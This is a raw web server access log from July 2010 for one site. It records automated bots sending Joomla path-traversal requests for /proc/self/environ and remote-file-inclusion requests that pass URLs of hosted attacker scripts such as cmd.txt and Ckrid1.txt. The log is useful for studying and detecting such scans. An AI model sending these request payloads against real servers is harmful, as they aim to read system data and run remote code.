195.42.120.131 - - [02/Jul/2010:19:26:58 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:26:58 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:26:58 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
195.42.120.131 - - [02/Jul/2010:19:27:08 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:30:03 -0700] "GET /logs/scripts.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:30:14 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:30:14 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:30:40 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:30:50 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:30:40 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:19:38:39 -0700] "GET /logs/access_100506.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:44:45 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:44:55 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:44:55 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:45:19 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:45:19 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:19:45:19 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:19:46:40 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:19:46:51 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.dbac.ac.th/smf115/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:47:29 -0700] "GET /logs/index.php?option=com_mambowiki&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:47:30 -0700] "GET /logs/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:47:26 -0700] "GET /logs/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:47:31 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:42 -0700] "GET /logs/access_090108.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:34 -0700] "GET /logs/access_090115.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:37 -0700] "GET /logs/access_090122.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:40 -0700] "GET /logs/access_090129.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:43 -0700] "GET /logs/access_090205.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:45 -0700] "GET /logs/access_090212.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:46 -0700] "GET /logs/access_090219.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:48 -0700] "GET /logs/access_090226.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:51:50 -0700] "GET /logs/access_090305.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [02/Jul/2010:19:52:02 -0700] "GET /logs/access_090312.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:54:49 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:54:39 -0700] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4804 "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:54:39 -0700] "GET /logs/access.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
216.86.146.14 - - [02/Jul/2010:19:55:25 -0700] "GET /logs/scripts.log//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:57:23 -0700] "GET /index.php?option=com_mambowiki&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:57:13 -0700] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:57:13 -0700] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:19:57:13 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
70.38.12.110 - - [02/Jul/2010:19:58:14 -0700] "GET /?option=com_gcalendar&controller=http://www.comazzitende.net/e107_plugins/autogallery/Images/Watermarks/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "Casper Bot Search" "www.elfagr.net"
70.38.12.110 - - [02/Jul/2010:19:58:03 -0700] "GET /logs/access.log%20%20/?option=com_gcalendar&controller=http://www.comazzitende.net/e107_plugins/autogallery/Images/Watermarks/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.elfagr.net"
70.38.12.110 - - [02/Jul/2010:19:58:03 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.comazzitende.net/e107_plugins/autogallery/Images/Watermarks/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "Casper Bot Search" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:00:59 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:00:49 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:00:49 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:09:12 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:09:01 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:09:01 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:09:52 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:20:14:09 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
78.46.71.91 - - [02/Jul/2010:20:14:10 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:20:16:21 -0700] "GET /logs//administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [02/Jul/2010:20:16:32 -0700] "GET /administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
95.154.248.22 - - [02/Jul/2010:20:17:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
95.154.248.22 - - [02/Jul/2010:20:17:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
95.154.248.22 - - [02/Jul/2010:20:20:56 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
95.154.248.22 - - [02/Jul/2010:20:20:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
95.154.248.22 - - [02/Jul/2010:20:21:05 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:23:35 -0700] "GET /logs/access.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:23:35 -0700] "GET /*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:23:35 -0700] "GET /logs/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
95.154.248.22 - - [02/Jul/2010:20:23:51 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:20:24:29 -0700] "GET /logs/scripts.log/*.?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
93.158.149.32 - - [02/Jul/2010:20:31:33 -0700] "GET /logs/access_100415.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
221.144.12.141 - - [02/Jul/2010:20:51:02 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
203.135.176.244 - - [02/Jul/2010:20:53:18 -0700] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.826" "www.elfagr.net"
221.144.12.141 - - [02/Jul/2010:20:58:40 -0700] "GET /logs/access_091203.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
221.144.12.141 - - [02/Jul/2010:20:58:41 -0700] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
221.144.12.141 - - [02/Jul/2010:20:58:41 -0700] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:15:40 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:15:29 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:15:40 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
190.254.58.196 - - [02/Jul/2010:21:22:26 -0700] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:22:50 -0700] "GET /logs/access.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:22:50 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:22:50 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:32:29 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:32:29 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:32:29 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:18 -0700] "GET /logs//index.php?option=com_remository&view=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:19 -0700] "GET /index.php?option=com_remository&view=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:19 -0700] "GET /logs/access_100204.log//index.php?option=com_remository&view=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:19 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:19 -0700] "GET /logs/access_100204.log//index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:19 -0700] "GET /logs/access_100204.log//index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:30 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:30 -0700] "GET /logs/access_100204.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:20 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:30 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:20 -0700] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:23 -0700] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:33 -0700] "GET /logs/access_091119.log//index.php?option=com_remository&view=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:34 -0700] "GET /logs/access_091119.log//index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:45 -0700] "GET /logs/access_091119.log//index.php?option=com_remository&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
83.103.62.243 - - [02/Jul/2010:21:36:45 -0700] "GET /logs/access_091119.log/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:39:17 -0700] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1465 "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:39:17 -0700] "GET /logs/scripts.log/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "rk q kangen" "www.elfagr.net"
74.124.198.60 - - [02/Jul/2010:21:39:28 -0700] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 4799 "-" "rk q kangen" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:42:50 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:42:50 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:42:51 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:43:01 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:21:44:07 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.241.190.214 - - [02/Jul/2010:21:44:19 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:46:24 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:46:25 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:48:04 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:48:21 -0700] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
209.40.100.50 - - [02/Jul/2010:21:48:11 -0700] "GET /web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
